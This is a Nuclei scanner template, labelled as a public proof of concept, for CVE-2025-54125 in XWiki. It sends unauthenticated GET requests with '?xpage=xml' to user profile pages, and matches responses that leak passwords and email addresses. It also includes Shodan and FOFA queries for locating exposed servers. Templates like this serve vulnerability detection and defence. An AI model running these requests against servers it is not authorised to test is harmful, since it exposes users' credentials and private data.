A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.
PoC代码[已公开]
id: CVE-2025-54125
info:
name: XWiki XML View - Sensitive Information Exposure
author: ritikchaddha
severity: high
description: |
A vulnerability in XWiki's XML view functionality exposes sensitive information such as passwords and email addresses that are stored in custom fields not explicitly named as password or email. This information disclosure occurs when accessing user profiles with the xml.vm template.
reference:
- https://jira.xwiki.org/browse/XWIKI-22810
- https://nvd.nist.gov/vuln/detail/CVE-2025-54125
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-359
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
max-request: 2
verified: true
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,exposure,vkev
http:
- method: GET
path:
- "{{BaseURL}}{{path}}"
payloads:
path:
- "/bin/view/XWiki/{{username}}?xpage=xml"
- "/xwiki/bin/view/XWiki/{{username}}?xpage=xml"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(content_type, 'text/xml')"
- "contains_all(body, '<users>', '<property>', '<author>', '<email>')"
condition: and
# digest: 490a0046304402200f304d67714b41aeef875435e9713c9521b16d23e634c08735e044756a35153902207964745cbd65c5be18453c63948fd3efffcf449d511f6cedd20b5f5d6ed29e90:922c64590222798bb761d5b6d8e72950